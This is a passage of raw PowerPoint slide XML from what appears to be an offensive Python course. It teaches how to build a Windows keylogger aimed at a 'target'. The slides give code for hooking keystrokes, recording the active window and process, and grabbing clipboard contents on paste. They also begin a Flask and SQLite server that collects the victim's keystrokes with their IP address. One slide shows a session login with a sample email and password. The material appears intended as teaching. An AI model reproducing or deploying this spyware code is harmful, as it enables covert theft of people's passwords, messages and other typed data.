            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This is majorly used to identify the window name so that the attacker knows which window the target pressed the captured keys for.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This essentially involves Win32 programming.</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80438" y="3564358"/>
            <a:ext cx="937204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get_current_process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hwnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = user32.GetForegroundWindow()</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c_ulong</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user32.GetWindowThreadProcessId(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hwnd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byref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pid.value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executable = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>create_string_buffer</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\x00</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h_process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = kernel32.OpenProcess(</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400</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psapi.GetModuleBaseNameA</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h_process</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byref</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(executable),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create_string_buffer</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\x00</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length = user32.GetWindowTextA(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hwnd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byref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512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add_info</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executable.value.decode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"utf-8"</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"replace"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window_title.value.decode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"utf-8"</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"replace"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3288C43C-6D81-4E4F-A3AE-FD0ECAED7E55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>136</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{971A6DCD-1C41-4D05-9FEE-E5D57CA64401}"/>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0296392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we extract the info of the process, we will close its handle and return its values:</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460386" y="2413337"/>
            <a:ext cx="9372047"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get_current_process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kernel32.CloseHandle(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hwnd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kernel32.CloseHandle(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>h_process</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executable.value.decode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"utf-8"</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"replace"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window_title.value.decode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"utf-8"</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"replace"</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0F94BA00-40CC-4388-89ED-B7431853FBE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>137</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58F39E91-4336-4150-96D4-592F4103D4BE}"/>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1334132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to the essential part, the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>key_pressed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, which will be executed every time the target clicks any key on the keyboard.</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1634966" y="2734180"/>
            <a:ext cx="9538360"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key_pressed</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event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global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global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current_window_title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check to see if target changed windows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event.WindowName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current_window</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event.WindowName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current_window_title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get_current_process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F64DB25B-2519-4060-892A-484A7987315B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135931" y="4798567"/>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any ASCII key is pressed, it gets added to the keylogger result.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE34119F-4918-489E-BF21-32129FBE2EAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1634966" y="5337012"/>
            <a:ext cx="9538360"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key_pressed</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event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32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>event.Ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>127</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add pressed key to the result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add_info</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current_window_title</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chr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event.Ascii</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F402425A-7141-450A-9525-58C5BE36C238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>138</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC564C77-D23B-4DD0-BA9E-54919EAC27B2}"/>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930321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the target presses CTRL-V, then it logs it as a paste operation.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Otherwise, it logs the special key (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>LControl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, Enter, …</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) between two brackets.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CC7B886-D84D-4FDB-B0BA-E1B8FFD177F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834190" y="2930697"/>
            <a:ext cx="11150840" cy="289310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key_pressed</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event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event.Key</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"V"</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win32clipboard.OpenClipboard()</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pasted_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = win32clipboard.GetClipboardData()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            win32clipboard.CloseClipboard()</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add pasted content to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keylog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> result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add_info</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current_window_title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"[PASTE] -&gt;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pasted_value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add special keys to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keylog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> result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add_info</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current_pid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current_window_title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event.Key</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5338B912-9DAD-4D52-A975-E66BE1FA411C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071519" y="5863938"/>
            <a:ext cx="6096000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finally, we return true to indicate that the handling of the key hook has been successfully handled.</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8113294" y="6018802"/>
            <a:ext cx="2696651"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key_pressed</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event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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{167D6110-27D1-4E28-B394-0D4CB4356E0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>139</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0D32743-27BE-409D-9ECE-B6BDB2BF2F82}"/>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459189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Creating a session</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56373" y="3129950"/>
            <a:ext cx="10137507" cy="230832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s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>requests.Session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token = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>res.text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s.post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 token,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"email"</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khalid@omani.cloud</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"password"</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"hello123"</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a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Sign Out"</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res.text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>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Sessions are used to “link” between requests, and they can be easily created with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Sessions preserve cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>To create a session:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0089F77-90FA-47BE-A821-77413E458FBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1124050" y="5882869"/>
            <a:ext cx="11140139"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have logged in without manually supplying cookies to the POST request.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A144843-5A86-43A9-BF82-2280F6165FE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27110256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the program we have written can act as a keylogger client, but we need to write the server program that will store those keystrokes of the target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We’ll start writing the keylogger server, which will store the target’s pressed keys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We will write a simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Flask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> API that will handle requests through HTTP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The server will store the keystrokes in SQLite database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>First, we will write the database, and then we will the web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We will use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>sqlite3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> standard module for our keylogger database.</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2806192" y="4181488"/>
            <a:ext cx="7260229"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sqlite3</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constants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DATABASE  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># name of database.</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create_db</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db_file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conn = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>None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conn = sqlite3.connect(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>db_file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(e)</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conn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A30E1B54-73EA-40AF-B721-3503D3F6E1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>140</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{570F229B-872C-4DB9-9A97-B7AFC5F7E766}"/>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2787886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write a function to initialize the keylogger result table (if it hasn’t been initialized yet):</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848854" y="2814593"/>
            <a:ext cx="8606590"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init_db</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keylogger_results_table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"""CREATE TABLE IF NOT EXISTS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keylogger_results</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id integer PRIMARY KEY,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ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> text NOT NULL,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executable_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> text NOT NULL,</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process_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> integer NOT NULL,</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window_title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> text NOT NULL,</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keys text NOT NULL</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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>conn.cursor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c.execute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keylogger_results_table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(e)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C19EDF56-2717-47DC-B0F0-1793E207B9AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>141</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{234E072E-3601-4B43-9DE9-D2897850A82F}"/>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347087981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write a function to insert the keystrokes to the database:</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860886" y="2469688"/>
            <a:ext cx="8867272"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insert_keylog</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conn</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ip_addr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keys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sql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"""INSERT INTO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keylogger_results</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ip_address</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executable_name</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process_id</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window_title</a:t>
            </a:r>
            <a:r>
